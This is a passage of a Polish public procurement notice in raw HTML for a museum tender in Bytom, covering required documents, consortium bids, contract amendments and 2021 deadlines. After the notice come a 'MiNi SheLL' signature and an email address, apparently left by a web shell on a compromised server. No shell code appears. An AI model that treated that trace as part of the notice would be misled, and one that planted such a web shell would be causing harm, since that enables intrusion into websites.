mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a<br/>w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie<br/>Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje<br/>bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy.<br/>3) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia,<br/>a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania<br/>tymi osobami.<br/>• składane na wezwanie Zamawiającego:<br/>Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (tekst jedn.: Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowe.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Stosowne Pełnomocnictwo(a):<br/>a) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamowienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia,<br/>albo reprezentowania w postępowaniu i zawarcia umowy,<br/>b) w przypadku, gdy ofertę podpisuje osoba posiadająca Pełnomicnictwo musi ono zawierać<br/>zakres umocowania <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmiotów<br/>gospodarczych (konsorcja/spółki cywilne).<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) Jeżeli oferta wspólna złożona przez dwóch lub więcej Wykonawców zostanie wyłoniona<br/>w prowadzonym postępowaniu, jako najkorzystniejsza, przed podpisaniem umowy w sprawie<br/>zamówienia Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej<br/>współpracę tych Wykonawców,<br/>3) Wykonawcy wspólnie ubiegający się o zamówienie ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, a<br/>pełnomocnictwo/upoważnienie do pełnienia takiej funkcji, wystawione zgodnie z wymogami<br/>ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego z Wykonawców,<br/>winno być dołączone do oferty.<br/>4) Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać:<br/>a) wskazanie postępowania o zamówienie, którego dotyczy,<br/>b) Wykonawców ubiegających się wspólnie o udzielenie zamówienia,<br/>c) ustanowionego pełnomocnika oraz<br/>d) zakres jego umocowania.<br/>5) Pełnomocnictwo, sporządza się w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym, podpisem osobistym lub kwalifikowanym podpisem<br/>elektronicznym.<br/>6) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden<br/>z nich nie może podlegać wykluczeniu z powodów, o których mowa art. 108 ust. 1 oraz art. 109<br/>ust. 1 pkt. 4 ustawy Pzp.<br/>7) Wszelka korespondencja prowadzona będzie z Pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na mocy art. 455 ust. 1 pkt 1) ustawy Zamawiający przewiduje następujące zmiany postanowień<br/>zawartej umowy:<br/>1) zmiany strony umowy w przypadku następstwa prawnego wynikającego z odrębnych<br/>przepisów,<br/>2) zmiany terminu wykonania umowy w przypadku:<br/>a) wystąpienia zdarzeń siły wyższej – o czas trwania przeszkody; w rozumieniu niniejszej umowy<br/>„siła wyższa” jest to zdarzenie nadzwyczajne, zewnętrzne wobec stron i niemożliwe do<br/>zapobieżenia, którego nie udało się uniknąć nawet w wypadku maksymalnej staranności stron;<br/>strona powołująca się na stan siły wyższej jest zobowiązana do niezwłocznego pisemnego<br/>powiadomienia drugiej strony, a następnie do udokumentowania zaistnienia tego stanu; obie<br/>strony będą zwolnione od odpowiedzialności za nie wykonanie umowy w takim zakresie, w jakim<br/>nastąpiło to na skutek zdarzeń siły wyższej,<br/>b) wystąpienia okoliczności leżących po stronie Zamawiającego lub niezawinionych przez<br/>Wykonawcę, uniemożliwiających rozpoczęcie, realizację w terminie lub kontynuowanie realizacji<br/>przedmiotu umowy,<br/>3) zmiany w kolejności i terminach płatności, w tym możliwość wprowadzenia płatności<br/>częściowych, w przypadku zmiany terminu lub sposobu realizacji zamówienia, 4) zmiany<br/>sposobu wykonywania umowy:<br/>a) spowodowanych siłą wyższą w rozumieniu ust. 3 pkt 2) lit. a), uniemożliwiającą wykonanie<br/>umowy zgodnie z jej postanowieniami,<br/>b) w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie,<br/>których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i<br/>doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony umowy,<br/>c) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-15 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/muzeum_bytom</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-15 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia<br/>oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów<br/>ustawy Pzp, przysługują środki ochrony prawnej określone w dziale IX ustawy Pzp, tj. odwołanie<br/>i skarga do sądu.

Creat By MiNi SheLL
Email: jattceo@gmail.com